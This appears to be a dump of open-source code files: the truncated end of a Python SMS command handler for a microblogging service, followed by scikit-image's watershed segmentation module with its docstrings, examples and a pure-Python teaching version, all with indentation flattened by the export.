mobile_ref = api.mobile_disassociate(api.ROOT, sender_ref.nick, sender)
self.send_message([sender], HELP_SIGNED_OUT)
def help(self, sender):
welcome = ' '.join([HELP_HELP_1,
HELP_HELP_2,
])
self.send_message([sender], welcome)
def start_notifications(self, sender):
sender_ref = api.actor_lookup_mobile(api.ROOT, sender)
if not sender_ref:
raise exception.ValidationError(HELP_SIGN_IN)
if sender_ref.extra.get('sms_double_opt_in', None):
message = ' '.join([HELP_DOUBLE_OPT_IN,
HELP_CHARGES])
self.send_message([sender], message)
return
actor_ref = api.settings_change_notify(api.ROOT, sender_ref.nick, sms=True)
message = ' '.join([HELP_START_NOTIFICATIONS,
HELP_CHARGES])
self.send_message([sender], message)
def stop_notifications(self, sender):
sender_ref = api.actor_lookup_mobile(api.ROOT, sender)
if not sender_ref:
raise exception.ValidationError(HELP_SIGN_IN)
actor_ref = api.settings_change_notify(api.ROOT, sender_ref.nick, sms=False)
self.send_message([sender], HELP_STOP_NOTIFICATIONS)
def post(self, sender, message):
sender_ref = api.actor_lookup_mobile(api.ROOT, sender)
if not sender_ref:
raise exception.ValidationError(HELP_SIGN_IN)
entry_ref = api.post(sender_ref, nick=sender_ref.nick, message=message)
def channel_post(self, sender, channel_nick, message):
sender_ref = api.actor_lookup_mobile(api.ROOT, sender)
if not sender_ref:
raise exception.ValidationError(HELP_SIGN_IN)
comment_ref = api.channel_post(
sender_ref,
message=message,
nick=sender_ref.nick,
channel=channel_nick
)
def add_comment(self, sender, nick, message):
sender_ref = api.actor_lookup_mobile(api.ROOT, sender)
if not sender_ref:
raise exception.ValidationError(HELP_SIGN_IN)
logging.debug("comment: %s %s %s", nick, sender_ref.nick, message)
nick = clean.nick(nick)
stream_entry = api.reply_get_cache(sender=nick,
target=sender_ref.nick,
service='sms')
if not stream_entry:
# Well, or memcache timed it out... Or we crashed... Or... Or...
raise exception.ValidationError(
'The message to which you tried to respond doesn\'t exist')
api.entry_add_comment(sender_ref, entry=stream_entry.keyname(),
content=message, nick=sender_ref.nick,
stream=stream_entry.stream)
| apache-2.0 |
bsipocz/scikit-image | skimage/morphology/watershed.py | 29 | 13277 | """watershed.py - watershed algorithm
This module implements a watershed algorithm that apportions pixels into
marked basins. The algorithm uses a priority queue to hold the pixels
with the metric for the priority queue being pixel value, then the time
of entry into the queue - this settles ties in favor of the closest marker.
Some ideas taken from
Soille, "Automated Basin Delineation from Digital Elevation Models Using
Mathematical Morphology", Signal Processing 20 (1990) 171-182.
The most important insight in the paper is that entry time onto the queue
solves two problems: a pixel should be assigned to the neighbor with the
largest gradient or, if there is no gradient, pixels on a plateau should
be split between markers on opposite sides.
Originally part of CellProfiler, code licensed under both GPL and BSD licenses.
Website: http://www.cellprofiler.org
Copyright (c) 2003-2009 Massachusetts Institute of Technology
Copyright (c) 2009-2011 Broad Institute
All rights reserved.
Original author: Lee Kamentsky
"""
from _heapq import heappush, heappop
import numpy as np
from scipy import ndimage as ndi
from ..filters import rank_order
from . import _watershed
def watershed(image, markers, connectivity=None, offset=None, mask=None):
"""
Return a matrix labeled using the watershed segmentation algorithm
Parameters
----------
image: ndarray (2-D, 3-D, ...) of integers
Data array where the lowest value points are labeled first.
markers: ndarray of the same shape as `image`
An array marking the basins with the values to be assigned in the
label matrix. Zero means not a marker. This array should be of an
integer type.
connectivity: ndarray, optional
An array with the same number of dimensions as `image` whose
non-zero elements indicate neighbors for connection.
Following the scipy convention, default is a one-connected array of
the dimension of the image.
offset: array_like of shape image.ndim, optional
offset of the connectivity (one offset per dimension)
mask: ndarray of bools or 0s and 1s, optional
Array of same shape as `image`. Only points at which mask == True
will be labeled.
Returns
-------
out: ndarray
A labeled matrix of the same type and shape as markers
See also
--------
skimage.segmentation.random_walker: random walker segmentation
A segmentation algorithm based on anisotropic diffusion, usually
slower than the watershed but with good results on noisy data and
boundaries with holes.
Notes
-----
This function implements a watershed algorithm [1]_that apportions pixels
into marked basins. The algorithm uses a priority queue to hold the pixels
with the metric for the priority queue being pixel value, then the time of
entry into the queue - this settles ties in favor of the closest marker.
Some ideas taken from
Soille, "Automated Basin Delineation from Digital Elevation Models Using
Mathematical Morphology", Signal Processing 20 (1990) 171-182
The most important insight in the paper is that entry time onto the queue
solves two problems: a pixel should be assigned to the neighbor with the
largest gradient or, if there is no gradient, pixels on a plateau should
be split between markers on opposite sides.
This implementation converts all arguments to specific, lowest common
denominator types, then passes these to a C algorithm.
Markers can be determined manually, or automatically using for example
the local minima of the gradient of the image, or the local maxima of the
distance function to the background for separating overlapping objects
(see example).
References
----------
.. [1] http://en.wikipedia.org/wiki/Watershed_%28image_processing%29
.. [2] http://cmm.ensmp.fr/~beucher/wtshed.html
Examples
--------
The watershed algorithm is very useful to separate overlapping objects
>>> # Generate an initial image with two overlapping circles
>>> x, y = np.indices((80, 80))
>>> x1, y1, x2, y2 = 28, 28, 44, 52
>>> r1, r2 = 16, 20
>>> mask_circle1 = (x - x1)**2 + (y - y1)**2 < r1**2
>>> mask_circle2 = (x - x2)**2 + (y - y2)**2 < r2**2
>>> image = np.logical_or(mask_circle1, mask_circle2)
>>> # Now we want to separate the two objects in image
>>> # Generate the markers as local maxima of the distance
>>> # to the background
>>> from scipy import ndimage as ndi
>>> distance = ndi.distance_transform_edt(image)
>>> from skimage.feature import peak_local_max
>>> local_maxi = peak_local_max(distance, labels=image,
... footprint=np.ones((3, 3)),
... indices=False)
>>> markers = ndi.label(local_maxi)[0]
>>> labels = watershed(-distance, markers, mask=image)
The algorithm works also for 3-D images, and can be used for example to
separate overlapping spheres.
"""
if connectivity is None:
c_connectivity = ndi.generate_binary_structure(image.ndim, 1)
else:
c_connectivity = np.array(connectivity, bool)
if c_connectivity.ndim != image.ndim:
raise ValueError("Connectivity dimension must be same as image")
if offset is None:
if any([x % 2 == 0 for x in c_connectivity.shape]):
raise ValueError("Connectivity array must have an unambiguous "
"center")
#
# offset to center of connectivity array
#
offset = np.array(c_connectivity.shape) // 2
# pad the image, markers, and mask so that we can use the mask to
# keep from running off the edges
pads = offset
def pad(im):
new_im = np.zeros(
[i + 2 * p for i, p in zip(im.shape, pads)], im.dtype)
new_im[[slice(p, -p, None) for p in pads]] = im
return new_im
if mask is not None:
mask = pad(mask)
else:
mask = pad(np.ones(image.shape, bool))
image = pad(image)
markers = pad(markers)
c_image = rank_order(image)[0].astype(np.int32)
c_markers = np.ascontiguousarray(markers, dtype=np.int32)
if c_markers.ndim != c_image.ndim:
raise ValueError("markers (ndim=%d) must have same # of dimensions "
"as image (ndim=%d)" % (c_markers.ndim, c_image.ndim))
if c_markers.shape != c_image.shape:
raise ValueError("image and markers must have the same shape")
if mask is not None:
c_mask = np.ascontiguousarray(mask, dtype=bool)
if c_mask.ndim != c_markers.ndim:
raise ValueError("mask must have same # of dimensions as image")
if c_markers.shape != c_mask.shape:
raise ValueError("mask must have same shape as image")
c_markers[np.logical_not(mask)] = 0
else:
c_mask = None
c_output = c_markers.copy()
#
# We pass a connectivity array that pre-calculates the stride for each
# neighbor.
#
# The result of this bit of code is an array with one row per
# point to be considered. The first column is the pre-computed stride
# and the second through last are the x,y...whatever offsets
# (to do bounds checking).
c = []
distances = []
image_stride = np.array(image.strides) // image.itemsize
for i in range(np.product(c_connectivity.shape)):
multiplier = 1
offs = []
indexes = []
ignore = True
for j in range(len(c_connectivity.shape)):
idx = (i // multiplier) % c_connectivity.shape[j]
off = idx - offset[j]
if off:
ignore = False
offs.append(off)
indexes.append(idx)
multiplier *= c_connectivity.shape[j]
if (not ignore) and c_connectivity.__getitem__(tuple(indexes)):
stride = np.dot(image_stride, np.array(offs))
d = np.sum(np.abs(offs)) - 1
offs.insert(0, stride)
c.append(offs)
distances.append(d)
c = np.array(c, dtype=np.int32)
c = c[np.argsort(distances)]
pq, age = __heapify_markers(c_markers, c_image)
pq = np.ascontiguousarray(pq, dtype=np.int32)
if np.product(pq.shape) > 0:
# If nothing is labeled, the output is empty and we don't have to
# do anything
c_output = c_output.flatten()
if c_mask is None:
c_mask = np.ones(c_image.shape, np.int8).flatten()
else:
c_mask = c_mask.astype(np.int8).flatten()
_watershed.watershed(c_image.flatten(),
pq, age, c,
c_mask,
c_output)
c_output = c_output.reshape(c_image.shape)[[slice(1, -1, None)] *
image.ndim]
try:
return c_output.astype(markers.dtype)
except:
return c_output
# ---------------------- deprecated ------------------------------
# Deprecate slower pure-Python code, that we keep only for
# pedagogical purposes
def __heapify_markers(markers, image):
"""Create a priority queue heap with the markers on it"""
stride = np.array(image.strides) // image.itemsize
coords = np.argwhere(markers != 0)
ncoords = coords.shape[0]
if ncoords > 0:
pixels = image[markers != 0]
age = np.arange(ncoords)
offset = np.zeros(coords.shape[0], int)
for i in range(image.ndim):
offset = offset + stride[i] * coords[:, i]
pq = np.column_stack((pixels, age, offset, coords))
# pixels = top priority, age=second
ordering = np.lexsort((age, pixels))
pq = pq[ordering, :]
else:
pq = np.zeros((0, markers.ndim + 3), int)
return (pq, ncoords)
def _slow_watershed(image, markers, connectivity=8, mask=None):
"""Return a matrix labeled using the watershed algorithm
Use the `watershed` function for a faster execution.
This pure Python function is solely for pedagogical purposes.
Parameters
----------
image: 2-d ndarray of integers
a two-dimensional matrix where the lowest value points are
labeled first.
markers: 2-d ndarray of integers
a two-dimensional matrix marking the basins with the values
to be assigned in the label matrix. Zero means not a marker.
connectivity: {4, 8}, optional
either 4 for four-connected or 8 (default) for eight-connected
mask: 2-d ndarray of bools, optional
don't label points in the mask
Returns
-------
out: ndarray
A labeled matrix of the same type and shape as markers
Notes
-----
This function implements a watershed algorithm [1]_that apportions pixels
into marked basins. The algorithm uses a priority queue to hold the pixels
with the metric for the priority queue being pixel value, then the time of
entry into the queue - this settles ties in favor of the closest marker.
Some ideas taken from
Soille, "Automated Basin Delineation from Digital Elevation Models Using
Mathematical Morphology", Signal Processing 20 (1990) 171-182
The most important insight in the paper is that entry time onto the queue
solves two problems: a pixel should be assigned to the neighbor with the
largest gradient or, if there is no gradient, pixels on a plateau should
be split between markers on opposite sides.
This implementation converts all arguments to specific, lowest common
denominator types, then passes these to a C algorithm.
Markers can be determined manually, or automatically using for example
the local minima of the gradient of the image, or the local maxima of the
distance function to the background for separating overlapping objects.
"""
if connectivity not in (4, 8):
raise ValueError("Connectivity was %d: it should be either \
four or eight" % (connectivity))
image = np.array(image)
markers = np.array(markers)
labels = markers.copy()
max_x = markers.shape[0]
max_y = markers.shape[1]
if connectivity == 4:
connect_increments = ((1, 0), (0, 1), (-1, 0), (0, -1))
else:
connect_increments = ((1, 0), (1, 1), (0, 1), (-1, 1),
(-1, 0), (-1, -1), (0, -1), (1, -1))
pq, age = __heapify_markers(markers, image)
pq = pq.tolist()
#
# The second step pops a value off of the queue, then labels and pushes
# the neighbors
#
while len(pq):
pix_value, pix_age, ignore, pix_x, pix_y = heappop(pq)
pix_label = labels[pix_x, pix_y]
for xi, yi in connect_increments:
x = pix_x + xi
y = pix_y + yi
if x < 0 or y < 0 or x >= max_x or y >= max_y:
continue
if labels[x, y]:
continue
if mask is not None and not mask[x, y]:
continue
# label the pixel
labels[x, y] = pix_label
# put the pixel onto the queue
heappush(pq, [image[x, y], age, 0, x, y])
age += 1
return labels
| bsd-3-clause |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.